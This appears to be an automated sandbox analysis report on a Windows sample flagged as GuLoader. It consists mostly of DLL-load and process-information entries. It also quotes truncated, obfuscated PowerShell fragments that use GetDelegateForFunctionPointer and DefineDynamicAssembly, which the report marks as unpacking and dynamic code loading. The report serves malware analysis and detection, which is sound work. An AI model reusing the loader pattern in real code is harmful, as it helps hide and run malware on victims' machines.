Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ulf4JrCRk2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb54= source: powershell.exe, 00000002.00000002.1562020960.0000000007185000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdbKN source: powershell.exe, 00000002.00000002.1568722465.0000000008453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb! source: powershell.exe, 00000002.00000002.1568722465.0000000008453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.1562020960.0000000007185000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.1569897869.000000000A302000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Mutualize $Ulvehunds76nsubstantiate240 $Fejrede), (Imbecil @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Birdeen = [AppDomain]::CurrentDomain.GetAssembli
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Guestwise)), $Centring).DefineDynamicModule($Sperrylite, $false).DefineType($Bedragene, $radiodontist, [System.MulticastDelegate])$Res

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

Code function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040601C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0456CE80 push eax; mov dword ptr [esp], edx	2_2_0456CE94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0744B1A7 push esp; retf	2_2_0744B1AB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0744AFB5 push esi; retf	2_2_0744AFBE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0744AE3B push 8B6BE6C2h; iretd	2_2_0744AE49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D640A8 push ss; iretd	2_2_08D640BC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D64816 push edx; iretd	2_2_08D64829
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D59375 push es; retf	2_2_08D59376
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D635C9 push ebx; ret	2_2_08D635CA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_02E30C6D push edi; retf	5_2_02E30C7A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_040D35C9 push ebx; ret	5_2_040D35CA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_040D40A8 push ss; iretd	5_2_040D40BC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_040C9375 push es; retf	5_2_040C9376
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_040D4816 push edx; iretd	5_2_040D4829

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
